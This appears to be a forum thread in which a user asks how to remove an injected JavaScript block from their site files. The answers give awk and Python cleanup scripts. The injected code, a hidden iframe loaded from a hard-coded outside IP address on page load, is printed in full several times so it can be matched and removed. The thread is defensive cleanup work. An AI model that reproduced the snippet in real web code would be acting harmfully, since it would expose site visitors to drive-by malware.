My JS files have got this malicious code which I want to get rid of. So files have multiple occurrences of it. Can anyone help use SED or AWK to remove it?

    if (typeof window.jsuekzis == 'undefined') {
        window.jsuekzis = 1;
        window.onload = function() {
            var iframe = document.createElement('iframe');
            iframe.style.display = "none";
            iframe.src = "http://155.94.75.92/iframe.html";
            document.body.appendChild(iframe);
        };
    }

Save just that code segment in a file named "bad" and then run this on your infected files (uses GNU awk for multi-char RS):

    awk -v RS='^$' -v ORS= '
    NR==FNR { bad=$0; lgth=length(bad); next }
    s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
    { print }
    ' bad infected

Once you're happy it's behaving as expected after testing on 1 infected file, you can add the inplace editing flag (again gawk-only) and run it on all of your infected files at once:

    awk -i inplace -v RS='^$' -v ORS= '
    NR==FNR { bad=$0; lgth=length(bad); print; next }
    s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
    { print }
    ' bad infected1 infected2 ... infectedN

wrt your command below that "it didn't work", look at it working:

    $ cat bad
    if (typeof window.jsuekzis == 'undefined') {
        window.jsuekzis = 1;
        window.onload = function() {
            var iframe = document.createElement('iframe');
            iframe.style.display = "none";
            iframe.src = "http://155.94.75.92/iframe.html";
            document.body.appendChild(iframe);
        };
    }

    $ cat infected
    foo
    if (typeof window.jsuekzis == 'undefined') {
        window.jsuekzis = 1;
        window.onload = function() {
            var iframe = document.createElement('iframe');
            iframe.style.display = "none";
            iframe.src = "http://155.94.75.92/iframe.html";
            document.body.appendChild(iframe);
        };
    }
    bar

    $ awk -v RS='^$' -v ORS= '
    NR==FNR { bad=$0; lgth=length(bad); next }
    s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
    { print }
    ' bad infected
    foo
    bar

I would suggest using a Python script:
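
    list_of_js_file_paths = ["/path/to/file/1", "/path/to/file/2"]
    for i in list_of_js_file_paths:
        original = ""
        # Read the whole file into memory
        with open(i, "r") as file:
            original = file.read()
        # Remove every exact copy of the block pasted in place of the placeholder
        original = original.replace("""
    <malicious_code>
    """, "")
        # Write the cleaned content back to the same file
        with open(i, "w") as file:
            file.write(original)
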
Now run it via sudo python3 yourpythonfile.py
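
As an added example (not from either answer above): a Python variant that matches the injected block even when copies differ in indentation or LF/CRLF line endings, removes every occurrence in a file, defaults to a dry run, and keeps a ".bak" copy before writing. The function names, the ".bak" suffix and the UTF-8 encoding are assumptions made for this example.

```python
import re
import shutil
from pathlib import Path

# The injected block from the question (indentation is ignored when matching).
BAD_BLOCK = """\
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://155.94.75.92/iframe.html";
document.body.appendChild(iframe);
};
}
"""

def block_pattern(block):
    """Regex for the block's lines in order, ignoring indentation,
    trailing blanks and LF/CRLF differences between copies."""
    lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
    sep = r"[ \t]*\r?\n[ \t]*"
    body = sep.join(re.escape(ln) for ln in lines)
    return re.compile(r"[ \t]*" + body + r"[ \t]*(?:\r?\n)?")

def clean_file(path, pattern, dry_run=True):
    """Remove every occurrence; return how many were found.
    With dry_run=True the file is only inspected, not changed."""
    path = Path(path)
    # newline="" stops Python translating CRLF, so untouched lines stay as-is
    with open(path, encoding="utf-8", newline="") as fh:
        original = fh.read()
    cleaned, count = pattern.subn("", original)
    if count and not dry_run:
        shutil.copy2(path, path.with_name(path.name + ".bak"))  # keep the original
        with open(path, "w", encoding="utf-8", newline="") as fh:
            fh.write(cleaned)
    return count

if __name__ == "__main__":
    import sys
    pat = block_pattern(BAD_BLOCK)
    for name in sys.argv[1:]:  # paths of suspected files; dry run only
        print(name, clean_file(name, pat, dry_run=True))
```

Run it with the suspected file paths as arguments to get a per-file count first; call clean_file with dry_run=False only once the counts look right.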